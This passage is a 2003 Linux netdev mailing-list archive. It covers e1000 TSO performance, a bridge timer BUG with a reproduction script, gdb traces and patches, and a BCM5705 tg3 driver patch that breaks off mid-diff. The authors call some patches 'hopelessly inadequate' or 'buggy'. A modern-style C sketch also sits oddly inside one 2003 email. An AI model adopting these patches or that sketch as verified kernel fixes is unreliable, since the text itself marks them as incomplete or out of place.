Miller" Cc: davidm@hpl.hp.com, davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-ID: <20030729065307.GC13227@krispykreme> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030714223822.23b78f9b.davem@redhat.com> User-Agent: Mutt/1.5.4i X-archive-position: 4362 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: anton@samba.org Precedence: bulk X-list: netdev Hi, > > So we get almost 15% of throughput drop. This was with plain "netkit > > ftpd". AFAIK, it does a simple read/write loop (not sendfile()). We've been seeing rather variable results for TSO as well. With TSO off, netperf TCP_STREAM will hit line speed and stay there. With TSO on, some runs will hit line speed and others will be about 100Mbit/sec slower. > When we use TSO for non-sendfile() applications it really > stresses memory allocations. We do these 64K+ kmalloc()'s > for each packet we construct. Yep, we definitely noticed much higher allocation activity when watching /proc/slab. Playing around with slab tuning didn't seem to help. Anton From akpm@osdl.org Tue Jul 29 01:32:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 01:32:43 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T8WQFl031007 for ; Tue, 29 Jul 2003 01:32:27 -0700 Received: from mnm (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with ESMTP id h6T8WHI22007; Tue, 29 Jul 2003 01:32:18 -0700 Date: Tue, 29 Jul 2003 01:32:34 -0700 From: Andrew Morton To: Christian Mautner Cc: netdev@oss.sgi.com, Stephen Hemminger Subject: Re: kernel BUG at kernel/timer.c:380!
Message-Id: <20030729013234.59c9f78b.akpm@osdl.org> In-Reply-To: <20030719022525.GA18446@mautner.ca> References: <20030719022525.GA18446@mautner.ca> X-Mailer: Sylpheed version 0.9.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4363 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Christian Mautner wrote: > > I have a very reproducible problem with 2.6.0-test1. Been looking into this bug in the bridge driver a little more. The problem is that we keep on calling br_stp_port_timer_init() against the bridge. But this does init_timer() against the bridge's timers, even though they are already running from the previous call. The init_timer() on a pending timer sets timer->base to NULL and we oops when the timer code tries to cascade the timers. Here's the script: #!/bin/sh doit() { echo $* $* } doit brctl addbr br0 doit brctl stp br0 off doit brctl addif br0 eth1 doit brctl addif br0 eth2 doit ifconfig eth1 up doit ifconfig eth2 up doit ifconfig br0 up And here's the result with a breakpoint on entry to br_stp_port_timer_init(): addif br0 eth1: Breakpoint 1, br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:37 #2 0xc0393d5b in new_nbp (br=0xf370c240, dev=0xf56e2004) at net/bridge/br_if.c:157 #3 0xc0393eae in br_add_if (br=0xf370c240, dev=0xf56e2004) at net/bridge/br_if.c:221 #4 0xc039450d in br_ioctl_device (br=0xf370c240, cmd=4, arg0=4, arg1=0, arg2=4106350596) at net/bridge/br_ioctl.c:64 #5 0xc0394fac in br_ioctl (br=0xf4c1f004, cmd=4, arg0=4, arg1=0, arg2=4106350596) at net/bridge/br_ioctl.c:306 #6 0xc03929e0 
in br_dev_do_ioctl (dev=0xf4c1f004, rq=0xf4c1f004, cmd=35312) at net/bridge/br_device.c:35 #7 0xc0338e05 in dev_ifsioc (ifr=0xf3663f48, cmd=35312) at net/core/dev.c:2375 #8 0xc033910e in dev_ioctl (cmd=35312, arg=0xbffff970) at net/core/dev.c:2538 #9 0xc032fff8 in sock_ioctl (inode=0xf4f6f030, file=0xf5b3b004, cmd=35312, arg=3221223792) at net/socket.c:771 #10 0xc017376f in sys_ioctl (fd=3, cmd=35312, arg=4109824004) at fs/ioctl.c:127 (gdb) c Continuing. addif br0 eth2: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc0393d5b in new_nbp (br=0xf370c240, dev=0xf5d76004) at net/bridge/br_if.c:157 #3 0xc0393eae in br_add_if (br=0xf370c240, dev=0xf5d76004) at net/bridge/br_if.c:221 #4 0xc039450d in br_ioctl_device (br=0xf370c240, cmd=4, arg0=5, arg1=0, arg2=4083437572) at net/bridge/br_ioctl.c:64 #5 0xc0394fac in br_ioctl (br=0xf3645004, cmd=4, arg0=5, arg1=0, arg2=4083437572) at net/bridge/br_ioctl.c:306 #6 0xc03929e0 in br_dev_do_ioctl (dev=0xf3645004, rq=0xf3645004, cmd=35312) at net/bridge/br_device.c:35 #7 0xc0338e05 in dev_ifsioc (ifr=0xf3663f48, cmd=35312) at net/core/dev.c:2375 #8 0xc033910e in dev_ioctl (cmd=35312, arg=0xbffff970) at net/core/dev.c:2538 #9 0xc032fff8 in sock_ioctl (inode=0xf35e9030, file=0xf4ca0004, cmd=35312, arg=3221223792) at net/socket.c:771 #10 0xc017376f in sys_ioctl (fd=3, cmd=35312, arg=4083060740) at fs/ioctl.c:127 (gdb) c Continuing. 
ifup eth1: Breakpoint 1, br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:81 #3 0xc0395068 in br_device_event (unused=0xc04ad94c, event=1, ptr=0xf56e2004) at net/bridge/br_notify.c:54 #4 0xc01322be in notifier_call_chain (n=0xf4c1f004, val=1, v=0xf56e2004) at kernel/sys.c:159 #5 0xc0337217 in dev_open (dev=0xf56e2004) at net/core/dev.c:780 #6 0xc0338965 in dev_change_flags (dev=0xf56e2004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf4c1f004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf52c5030, file=0xf35d0004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4113321988) at fs/ioctl.c:127 (gdb) c Continuing. 
ifup eth2: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #3 0xc0395068 in br_device_event (unused=0xc04ad94c, event=1, ptr=0xf5d76004) at net/bridge/br_notify.c:54 #4 0xc01322be in notifier_call_chain (n=0xf3645004, val=1, v=0xf5d76004) at kernel/sys.c:159 #5 0xc0337217 in dev_open (dev=0xf5d76004) at net/core/dev.c:780 #6 0xc0338965 in dev_change_flags (dev=0xf5d76004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf3645004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf4f6f030, file=0xf5b3b004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4109824004) at fs/ioctl.c:127 (gdb) c Continuing. 
ifup br0: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #3 0xc039627f in br_stp_enable_bridge (br=0xf370c240) at net/bridge/br_stp_if.c:51 #4 0xc0392af2 in br_dev_open (dev=0xf3645004) at net/bridge/br_device.c:90 #5 0xc03371e7 in dev_open (dev=0xf370c004) at net/core/dev.c:752 #6 0xc0338965 in dev_change_flags (dev=0xf370c004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf3645004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf35d6030, file=0xf35e4004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4082982916) at fs/ioctl.c:127 (gdb) c Continuing. Here the `ifup br0' hits my BUG() in br_timer_init(): Program received signal SIGTRAP, Trace/breakpoint trap. 
br_timer_init (timer=0xf3645040, _function=0xf3645040, _data=4083437632) at net/bridge/br_stp_timer.c:152 152 BUG(); (gdb) bt #0 br_timer_init (timer=0xf3645040, _function=0xf3645040, _data=4083437632) at net/bridge/br_stp_timer.c:152 #1 0xc0396ef0 in br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:178 #2 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #3 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #4 0xc039627f in br_stp_enable_bridge (br=0xf370c240) at net/bridge/br_stp_if.c:51 #5 0xc0392af2 in br_dev_open (dev=0xf3645040) at net/bridge/br_device.c:90 #6 0xc03371e7 in dev_open (dev=0xf370c004) at net/core/dev.c:752 #7 0xc0338965 in dev_change_flags (dev=0xf370c004, flags=4163) at net/core/dev.c:2169 #8 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #9 0xc03763b7 in inet_ioctl (sock=0xf3645040, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #10 0xc0330232 in sock_ioctl (inode=0xf35d6030, file=0xf35e4004, cmd=35092, arg=3221223568) at net/socket.c:830 #11 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4082982916) at fs/ioctl.c:127 See, we keep on reinitialising already-running timers over and over again. It is seriously broken. 
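The failure mode traced above, re-initialising a timer that is still queued, can be shown with a small user-space model. This is only a sketch under stated assumptions: timer_model and every model_* function are hypothetical stand-ins, not the kernel timer API, and the structure must be zero-initialised before first use (the real code would need a validity check such as a magic field). The guard refuses to re-initialise a pending timer instead of silently resetting its base pointer.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of a timer: base is non-NULL while the timer is
 * queued, mirroring the role of timer->base in the report above. */
struct timer_model {
    void *base;
    void (*function)(unsigned long);
    unsigned long data;
};

static int model_queue;         /* stands in for the per-CPU timer base */

static void model_expired(unsigned long data)
{
    (void)data;                 /* placeholder expiry handler */
}

static bool model_timer_pending(const struct timer_model *t)
{
    return t->base != NULL;
}

/* Like an unconditional init: forgets any queue membership. Calling
 * this on a pending timer is exactly the bug being described. */
static void model_init_timer(struct timer_model *t)
{
    t->base = NULL;
}

static void model_add_timer(struct timer_model *t)
{
    t->base = &model_queue;
}

static void model_del_timer(struct timer_model *t)
{
    t->base = NULL;
}

/* Guarded setup: returns false and leaves the timer untouched if it
 * is still pending, so the caller has to delete it first. */
static bool model_timer_setup_once(struct timer_model *t,
                                   void (*fn)(unsigned long),
                                   unsigned long data)
{
    if (model_timer_pending(t))
        return false;
    model_init_timer(t);
    t->function = fn;
    t->data = data;
    return true;
}
```

With this shape, a second setup call on a running timer fails visibly and the original function and data stay intact; the caller can then decide whether to call model_del_timer() first or skip the re-initialisation altogether.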
Here's the debug patch: kernel/timer.c | 4 ++++ net/bridge/br_stp_timer.c | 4 +++- 2 files changed, 7 insertions(+), 1 deletion(-) diff -puN kernel/timer.c~a kernel/timer.c --- 25/kernel/timer.c~a 2003-07-29 00:29:10.000000000 -0700 +++ 25-akpm/kernel/timer.c 2003-07-29 00:29:52.000000000 -0700 @@ -377,6 +377,10 @@ static int cascade(tvec_base_t *base, tv struct timer_list *tmp; tmp = list_entry(curr, struct timer_list, entry); + if (tmp->base != base) { + printk("%s: tmp->base=%p, base=%p\n", + __FUNCTION__, tmp->base, base); + } BUG_ON(tmp->base != base); curr = curr->next; internal_add_timer(base, tmp); diff -puN net/bridge/br_stp_timer.c~a net/bridge/br_stp_timer.c --- 25/net/bridge/br_stp_timer.c~a 2003-07-29 00:40:27.000000000 -0700 +++ 25-akpm/net/bridge/br_stp_timer.c 2003-07-29 00:41:11.000000000 -0700 @@ -144,10 +144,12 @@ static void br_hold_timer_expired(unsign spin_unlock_bh(&p->br->lock); } -static inline void br_timer_init(struct timer_list *timer, +static void br_timer_init(struct timer_list *timer, void (*_function)(unsigned long), unsigned long _data) { + if (timer->magic == TIMER_MAGIC && timer_pending(timer)) + BUG(); init_timer(timer); timer->function = _function; timer->data = _data; _ This patch partially reverts a change which Stephen made and randomly adds new stuff: net/bridge/br_if.c | 3 ++- net/bridge/br_notify.c | 6 ++++-- 2 files changed, 6 insertions(+), 3 deletions(-) diff -puN net/bridge/br_notify.c~bridge-fix net/bridge/br_notify.c --- 25/net/bridge/br_notify.c~bridge-fix 2003-07-29 01:23:29.000000000 -0700 +++ 25-akpm/net/bridge/br_notify.c 2003-07-29 01:23:35.000000000 -0700 @@ -47,11 +47,13 @@ static int br_device_event(struct notifi break; case NETDEV_DOWN: - br_stp_disable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_disable_port(p); break; case NETDEV_UP: - br_stp_enable_port(p); + if (!(br->dev->flags & IFF_UP)) + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: diff -puN net/bridge/br_if.c~bridge-fix 
net/bridge/br_if.c --- 25/net/bridge/br_if.c~bridge-fix 2003-07-29 01:28:07.000000000 -0700 +++ 25-akpm/net/bridge/br_if.c 2003-07-29 01:28:13.000000000 -0700 @@ -154,7 +154,8 @@ static struct net_bridge_port *new_nbp(s dev->br_port = p; p->port_no = i; - br_init_port(p); + if (!(br->dev->flags & IFF_UP)) + br_init_port(p); p->state = BR_STATE_DISABLED; list_add_rcu(&p->list, &br->port_list); _ but it is hopelessly inadequate. From billd@cait.wustl.edu Tue Jul 29 05:51:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 05:52:06 -0700 (PDT) Received: from kronos.wustl.edu (kronos.cait.wustl.edu [128.252.53.11]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6TCpvFl023577 for ; Tue, 29 Jul 2003 05:51:58 -0700 Received: by kronos.cait.wustl.edu with Internet Mail Service (5.5.2653.19) id ; Tue, 29 Jul 2003 08:07:29 -0500 Message-ID: From: Bill Darte To: "'netdev@oss.sgi.com'" Subject: Re: TCPPureAcks TCPHPAcks - Definition? Date: Tue, 29 Jul 2003 08:07:27 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" X-archive-position: 4364 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: billd@cait.wustl.edu Precedence: bulk X-list: netdev Please help by identifying an archive or any other reference where I can find explanations of all the networking statistics produced by netstat -s on the linux os. Thanks so much and apologies if this is redundant. 
Bill Darte CAIT Senior Technical Associate billd@cait.wustl.edu 314 935-7575 From garzik@gtf.org Tue Jul 29 09:24:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 09:24:17 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6TGO7Fl023652 for ; Tue, 29 Jul 2003 09:24:08 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 47C496642; Tue, 29 Jul 2003 12:24:01 -0400 (EDT) Date: Tue, 29 Jul 2003 12:24:01 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] 2.4.x net driver merges Message-ID: <20030729162401.GB1920@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4365 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev BK users, pull from bk pull bk://gkernel.bkbits.net/net-drivers-2.4 Others may download the patch from ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre8-netdrvr1.patch.bz2 This will update the following files: Documentation/Configure.help | 12 Documentation/networking/ifenslave.c | 90 + drivers/net/Config.in | 1 drivers/net/Makefile | 1 drivers/net/b44.c | 1881 +++++++++++++++++++++++++++++++++++ drivers/net/b44.h | 543 ++++++++++ drivers/net/wireless/airo.c | 767 ++++++++------ 7 files changed, 2962 insertions(+), 333 deletions(-) through these ChangeSets: (03/07/29 1.1039) [netdrvr] add new broadcom 440x net driver, "b44" By David Miller, with many fixes from Pekka Pietikainen. 
(03/07/29 1.1038) [wireless airo] adds support for noise level reporting (if available) (03/07/29 1.1037) [wireless airo] makes the card passive when entering monitor mode (03/07/29 1.1036) [wireless airo] eliminate infinite loop makes sure a possible (never happened, but just in case) infinite loop in the transmission code terminates. (03/07/29 1.1035) [wireless airo] safer shutdown sequence changes the card shutdown sequence to a safer one (03/07/29 1.1034) [wireless airo] fix Tx race (03/07/19 1.1032) [bonding] fix ifenslave ABI bug (03/07/19 1.1031) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1030) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1029) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1028) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1027) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1026) [wireless airo] Fix small endianness bug. (03/07/19 1.1025) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1024) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1023) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1022) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1021) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1020) [wireless airo] sync with 2.6 Trivialities: spelling, stack usage, checking return vals, etc. 
From garzik@gtf.org Tue Jul 29 10:10:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:10:11 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THA0Fl028735 for ; Tue, 29 Jul 2003 10:10:02 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C14A36642; Tue, 29 Jul 2003 13:09:54 -0400 (EDT) Date: Tue, 29 Jul 2003 13:09:54 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: PATCH: bcm5705 support -- buggy Message-ID: <20030729170954.GA16370@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4366 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev There are a lot of requests for Broadcom BCM5705/5782 support. Here is the current patch for it... it's not as simple as adding the PCI ids, as some have speculated. Note that this patch does not work fully yet (otherwise it would have been sent to Marcelo/Linus long before now). I should have it fully debugged before September rolls around, but here's the pre-release if hackers want to play. diff -Nru a/drivers/net/tg3.c b/drivers/net/tg3.c --- a/drivers/net/tg3.c Tue Jul 29 13:08:22 2003 +++ b/drivers/net/tg3.c Tue Jul 29 13:08:22 2003 @@ -69,7 +69,8 @@ /* hardware minimum and maximum for a single frame's data payload */ #define TG3_MIN_MTU 60 -#define TG3_MAX_MTU 9000 +#define TG3_MAX_MTU(tp) \ + (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705 ? 9000 : 1500) /* These numbers seem to be hard coded in the NIC firmware somehow. 
* You can't change the ring sizes, but you can change where you place @@ -79,7 +80,17 @@ #define TG3_DEF_RX_RING_PENDING 200 #define TG3_RX_JUMBO_RING_SIZE 256 #define TG3_DEF_RX_JUMBO_RING_PENDING 100 -#define TG3_RX_RCB_RING_SIZE 1024 + +/* Do not place this n-ring entries value into the tp struct itself, + * we really want to expose these constants to GCC so that modulo et + * al. operations are done with shifts and masks instead of with + * hw multiply/modulo instructions. Another solution would be to + * replace things like '% foo' with '& (foo - 1)'. + */ +#define TG3_RX_RCB_RING_SIZE(tp) \ + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705 ? \ + 512 : 1024) + #define TG3_TX_RING_SIZE 512 #define TG3_DEF_TX_RING_PENDING (TG3_TX_RING_SIZE - 1) @@ -87,8 +98,8 @@ TG3_RX_RING_SIZE) #define TG3_RX_JUMBO_RING_BYTES (sizeof(struct tg3_rx_buffer_desc) * \ TG3_RX_JUMBO_RING_SIZE) -#define TG3_RX_RCB_RING_BYTES (sizeof(struct tg3_rx_buffer_desc) * \ - TG3_RX_RCB_RING_SIZE) +#define TG3_RX_RCB_RING_BYTES(tp) (sizeof(struct tg3_rx_buffer_desc) * \ + TG3_RX_RCB_RING_SIZE(tp)) #define TG3_TX_RING_BYTES (sizeof(struct tg3_tx_buffer_desc) * \ TG3_TX_RING_SIZE) #define TX_RING_GAP(TP) \ @@ -129,6 +140,10 @@ PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5702FE, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, + { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5705, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, + { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5705M, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5702X, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5703X, @@ -274,17 +289,28 @@ static void tg3_switch_clocks(struct tg3 *tp) { - if (tr32(TG3PCI_CLOCK_CTRL) & CLOCK_CTRL_44MHZ_CORE) { + u32 clock_ctrl = tr32(TG3PCI_CLOCK_CTRL); + u32 orig_clock_ctrl; + + orig_clock_ctrl = clock_ctrl; + clock_ctrl &= (CLOCK_CTRL_FORCE_CLKRUN | + CLOCK_CTRL_CLKRUN_OENABLE | + 0x1f); + 
tp->pci_clock_ctrl = clock_ctrl; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705 && + (orig_clock_ctrl & CLOCK_CTRL_44MHZ_CORE) != 0) { tw32(TG3PCI_CLOCK_CTRL, + clock_ctrl | (CLOCK_CTRL_44MHZ_CORE | CLOCK_CTRL_ALTCLK)); tr32(TG3PCI_CLOCK_CTRL); udelay(40); tw32(TG3PCI_CLOCK_CTRL, - (CLOCK_CTRL_ALTCLK)); + clock_ctrl | (CLOCK_CTRL_ALTCLK)); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } - tw32(TG3PCI_CLOCK_CTRL, 0); + tw32(TG3PCI_CLOCK_CTRL, clock_ctrl); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } @@ -387,6 +413,18 @@ return ret; } +static void tg3_phy_set_wirespeed(struct tg3 *tp) +{ + u32 val; + + if (tp->tg3_flags2 & TG3_FLG2_NO_ETH_WIRE_SPEED) + return; + + tg3_writephy(tp, MII_TG3_AUX_CTRL, 0x7007); + tg3_readphy(tp, MII_TG3_AUX_CTRL, &val); + tg3_writephy(tp, MII_TG3_AUX_CTRL, (val | (1 << 15) | (1 << 4))); +} + /* This will reset the tigon3 PHY if there is no valid * link unless the FORCE argument is non-zero. */ @@ -422,12 +460,102 @@ if ((phy_control & BMCR_RESET) == 0) { udelay(40); - return 0; + goto out; } udelay(10); } return -EBUSY; + +out: + tg3_phy_set_wirespeed(tp); + return 0; +} + +static void tg3_frob_aux_power(struct tg3 *tp) +{ + struct tg3 *tp_peer = tp; + + if ((tp->tg3_flags & TG3_FLAG_EEPROM_WRITE_PROT) != 0) + return; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) { + tp_peer = pci_get_drvdata(tp->pdev_peer); + if (!tp_peer) + BUG(); + } + + + if ((tp->tg3_flags & TG3_FLAG_WOL_ENABLE) != 0 || + (tp_peer->tg3_flags & TG3_FLAG_WOL_ENABLE) != 0) { + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } else { + if (tp_peer != tp && + (tp_peer->tg3_flags & TG3_FLAG_INIT_COMPLETE) != 0) + return; + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + 
(GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT1 | + GRC_LCLCTRL_GPIO_OUTPUT2)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1 | + GRC_LCLCTRL_GPIO_OUTPUT2)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } + } else { + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701) { + if (tp_peer != tp && + (tp_peer->tg3_flags & TG3_FLAG_INIT_COMPLETE) != 0) + return; + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } + } } static int tg3_setup_phy(struct tg3 *); @@ -533,89 +661,65 @@ udelay(10); } - if (tp->tg3_flags & TG3_FLAG_WOL_SPEED_100MB) { + if (!(tp->tg3_flags & TG3_FLAG_WOL_SPEED_100MB) && + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701)) { u32 base_val; - base_val = 0; - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) - base_val |= (CLOCK_CTRL_RXCLK_DISABLE | - CLOCK_CTRL_TXCLK_DISABLE); - - 